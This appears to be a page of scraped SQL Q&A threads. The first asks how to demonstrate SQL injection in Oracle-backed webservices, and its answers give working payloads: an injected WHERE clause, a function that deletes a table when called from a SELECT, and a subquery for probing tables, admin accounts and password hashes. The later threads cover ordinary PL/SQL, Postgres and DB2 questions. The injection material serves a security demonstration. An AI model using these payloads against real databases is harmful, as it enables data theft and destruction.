I want to demonstrate the insecurity of some webservices that we have. These send unsanitized user input to an Oracle database Select statements.
SQL injection on SELECT statements is possible (through the WHERE clause), however I am having a hard time to demonstrate it as the same parameter gets placed in other queries as well during the same webservice call.
E.g:
' or client_id = 999'--
will exploit the first query but as the same WS request calls runs other SQL SELECTs, it will return an oracle error on the next query because the client_id is referred to by an alias in the second table.
I am looking to find something more convincing rather than just having an ORA error returned such as managing to drop a table in the process. However I do not think this is possible from a Select statement.
Any ideas how I can cause some data to change, or maybe get sensitive data to be included as part of an ORA error?
It's not very easy to change data, but it's still possible. Function that created with pragma autonomous_transaction can contain dml and may be called in where. For instance,
CREATE OR REPLACE FUNCTION test_funct return int
IS
pragma autonomous_transaction;
BEGIN
DELETE FROM test_del;
commit;
return 0;
end;
-- and then
SELECT null from dual where test_funct()=1;
Another option you try creating huge subquery in WHERE which in turn may cause huge performance issue on server.
You do not need a custom function, you can use a sub-query:
" or client_id = (SELECT 999 FROM secret_table WHERE username = 'Admin' AND password_hash = '0123456789ABCD')"
If the query succeeds then you know that:
There is a table called secret_table that can be seen by the user executing this query (even if there is not a user interface that would typically be used to directly interact with that table);
That it has the columns username and password_hash;
That there is a user called Admin; and
That the admin user has a password that hashes to 0123456789ABCD.
You can repeat this and map the structure of the entire database and check for any values in the database.
Related
I want to know if I can create a PL/SQL procedure that the number of parameters and their types changes.
For example procedure p1.
I can use it like this
p1 (param1, param2,......., param n);
i want to pass table name and data in procedure, but the attributes change for every table,
create or replace PROCEDURE INSERTDATA(NOMT in varchar2) is
num int;
BEGIN
EXECUTE IMMEDIATE 'SELECT count(*) FROM user_tables WHERE table_name = :1'
into num using NOMT ;
IF( num < 1 )
THEN
dbms_output.put_line('table not exist !!! ');
ELSE
dbms_output.put_line('');
-- here i want to insert parameters in the table,
-- but the table attributes are not the same !!
END IF;
NULL;
END INSERTDATA;
As far as I can tell, no, you can not. Number and datatypes of all parameters must be fixed.
You could pass a collection as a parameter (and have different number of values within it), but - that's still a single parameter.
Where would you want to use such a procedure?
If you need to store, update and query a variable amount of information, might I recommend switching to JSON queries and objects in Oracle. Oracle has deep support for both fixed and dynamic querying of json data, both in SQL and PLSQL.
i want to pass table name and data in procedure, but the attributes change for every table,
The problem with such a universal procedure is that something needs to know the structure of the target table. Your approach demands that the caller has to discover the projection of the table and arrange the parameters in a correct fashion.
In no particular order:
This is bad practice because it requires the calling program to do the hard work regarding the data dictionary.
Furthermore it breaks the Law Of Demeter because the calling program needs to understand things like primary keys (sequences, identity columns, etc), foreign key lookups, etc
This approach mandates that all columns must be populated; it makes no allowance for virtual columns, optional columns, etc
To work the procedure would have to use dynamic SQL, which is always hard work because it turns compilation errors into runtime errors, and should be avoided if at all possible.
It is trivially simple to generate a dedicated insert procedure for each table in a schema, using dynamic SQL against the data dictionary. This is the concept of the Table API. It's not without its own issues but it is much safer than what your question proposes.
I have a role in postgres as follows:
create role admin login password 'some_password';
What I'd like instead is:
create role admin login (select current_setting('custom.ADMIN_PASSWORD'));
But this fails with the error:
ERROR: syntax error at or near "("
LINE 2: (SELECT ...
I expected this to work, because it works in the following example:
select public.register_account(
email := (SELECT current_setting('custom.SOME_EMAIL')),
password := (SELECT current_setting('custom.SOME_PASSWORD'))
);
How can I use current_setting() to apply a role password?
Bonus Points: Why does my first example fail, while my second succeeds?
The first failed because DDL changes like that aren't your general everyday SQL. Think of a statement like the creation of a role as being special within the context of PostgreSQL. In general the database engine prefers DDL and other structural changes to be explicit, not calculated on the fly like a lot of the rest of SQL.
You can however get around this restriction by using a "do" block, essentially an inline function. Combined with the EXECUTE command and the format() function, you can go dynamic to your heart's content. Only be warned that with great power comes great responsibility. Dynamic SQL like this should be avoided in general unless you truly have no other alternative since it short circuits a lot of the grammar/parser validation. Simple mistakes become a lot harder to see and fix while at the same time—due to it being a structural change to the database rather than just another row of data—far more serious in effect when bugs arise. Many tasks like CREATE ROLE do not allow dynamic shenanigans by default precisely for this reason.
All that said, this will get you going.
DO $$
BEGIN
EXECUTE format('CREATE ROLE admin LOGIN PASSWORD ''%1$s'';',
current_setting('custom.ADMIN_PASSWORD'));
END;
$$ LANGUAGE plpgsql;
I'm getting an error while trying to create 2 tables in Green Screen STRSQL.
CREATE TABLE QTEMP/CUSTOMER AS (SELECT * FROM CBHHUBFP/SSCUSTP)
CREATE TABLE QTEMP/ADDRESS AS (SELECT * FROM QTEMP/CUSTOMER)
ERROR: Keyword Create not expected
Valied Tokens End-Of-Statement
Am I missing something here?
Using STRSQL you can only execute one SQL statement at time.
Re my comment to the accepted answer by #dcieslak, the following is an example of a Dynamic Compound Statement (DCS) with syntax that should be valid for use with the /*SYS naming-option, on any system [level of DB2 for IBM i], since the availability of that DCS feature; notice the addition of the WITH DATA clause to make the statement syntactically correct, and enclosing the two semicolon separated requests as CREATE TABLE statements, inside of the BEGIN and END:
begin
CREATE TABLE QTEMP/CUSTOMER AS (SELECT * FROM qiws/qcustcdt )
with data
;
CREATE TABLE QTEMP/ADDRESS AS (SELECT * FROM QTEMP/CUSTOMER)
with data
;
end
-- Table ADDRESS created in QTEMP. /* <-- feedback of final rqs */
While that is possible to enter as a single request, there is likely no point in coding that, per the extra overhead; perhaps if run under isolation and doing more work and coding exception handling, then there would be value. IOW, the Start Interactive SQL Session (STRSQL) scripting environment allows the isolation and user decisions to react to exceptions when the statement are entered individually, successively, Enter pressed after each.
So unless the idea is to test what might be written in a routine [as a compound statement, statements between BEGIN-END pairs] without actually coding the CREATE PROCEDURE [or CREATE FUNCTION ¿or CREATE TRIGGER?] with a routine-body, then the implicitly created routine [as procedure] that is then run and deleted to implement the DCS, is probably mostly just a bunch of extra/unnecessary work.
Question: Is there any way to detect if an SQL statement is syntactically correct?
Explanation:
I have a very complex application, which, at some point, need very specific (and different) processing for different cases.
The solution was to have a table where there is a record for each condition, and an SQL command that is to be executed.
That table is not accessible to normal users, only to system admins who define those cases when a new special case occurs. So far, a new record was added directly to the table.
However, from time to time there was typos, and the SQL was malformed, causing issues.
What I want to accomplish is to create a UI for managing that module, where to let admins to type the SQL command, and validate it before save.
My idea was to simply run the statement in a throw block and then capture the result (exception, if any), but I'm wondering of there is a more unobtrusive approach.
Any suggestion on this validation?
Thanks
PS. I'm aware of risk of SQL injection here, but it's not the case - the persons who have access to this are strictly controlled, and they are DBA or developers - so the risk of SQL injection here is the same as the risk to having access to Enterprise Manager
You can use SET PARSEONLY ON at the top of the query. Keep in mind that this will only check if the query is syntactically correct, and will not catch things like misspelled tables, insufficient permissions, etc.
Looking at the page here, you can modify the stored procedure to take a parameter:
CREATE PROC TestValid #stmt NVARCHAR(MAX)
AS
BEGIN
IF EXISTS (
SELECT 1 FROM sys.dm_exec_describe_first_result_set(#stmt, NULL, 0)
WHERE error_message IS NOT NULL
AND error_number IS NOT NULL
AND error_severity IS NOT NULL
AND error_state IS NOT NULL
AND error_type IS NOT NULL
AND error_type_desc IS NOT NULL )
BEGIN
SELECT error_message
FROM sys.dm_exec_describe_first_result_set(#stmt, NULL, 0)
WHERE column_ordinal = 0
END
END
GO
This will return an error if one exists and nothing otherwise.
I have to execute a loop in database. This is only a one time requirement.
After executing the function, I am dropping the function now.
Is there any good approach for creating temporary / disposable functions?
I needed to know how to do a many time use in a script I was writing. Turns out you can create a temporary function using the pg_temp schema. This is a schema that is created on demand for your connection and is where temporary tables are stored. When your connection is closed or expires this schema is dropped. Turns out if you create a function on this schema, the schema will be created automatically. Therefore,
create function pg_temp.testfunc() returns text as
$$ select 'hello'::text $$ language sql;
will be a function that will stick around as long as your connection sticks around. No need to call a drop command.
A couple of additional notes to the smart trick in #crowmagnumb's answer:
The function must be schema-qualified at all times, even if pg_temp is in the search_path (like it is by default), according to Tom Lane to prevent Trojan horses:
CREATE FUNCTION pg_temp.f_inc(int)
RETURNS int AS 'SELECT $1 + 1' LANGUAGE sql IMMUTABLE;
SELECT pg_temp.f_inc(42);
f_inc
-----
43
A function created in the temporary schema is only visible inside the same session (just like temp tables). It's invisible to all other sessions (even for the same role). You could access the function as a different role in the same session after SET ROLE.
You could even create a functional index based on this "temp" function:
CREATE INDEX foo_idx ON tbl (pg_temp.f_inc(id));
Thereby creating a plain index using a temporary function on a non-temp table. Such an index would be visible to all sessions but still only valid for the creating session. The query planner will not use a functional index, where the expression is not repeated in the query. Still a bit of a dirty trick. It will be dropped automatically when the session is closed - as a depending object. Feels like this should not be allowed at all ...
If you just need to execute a function repeatedly and all you need is SQL, consider a prepared statement instead. It acts much like a temporary SQL function that dies at the end of the session. Not the same thing, though, and can only be used by itself with EXECUTE, not nested inside another query. Example:
PREPARE upd_tbl AS
UPDATE tbl t SET set_name = $2 WHERE tbl_id = $1;
Call:
EXECUTE upd_tbl(123, 'foo_name');
Details:
Split given string and prepare case statement
If you are using version 9.0, you can do this with the new DO statement:
http://www.postgresql.org/docs/current/static/sql-do.html
With previous versions, you'll need to create the function, call it, and drop it again.
For ad hock procedures, cursors aren't too bad. They are too inefficient for productino use however.
They will let you easily loop on sql results in the db.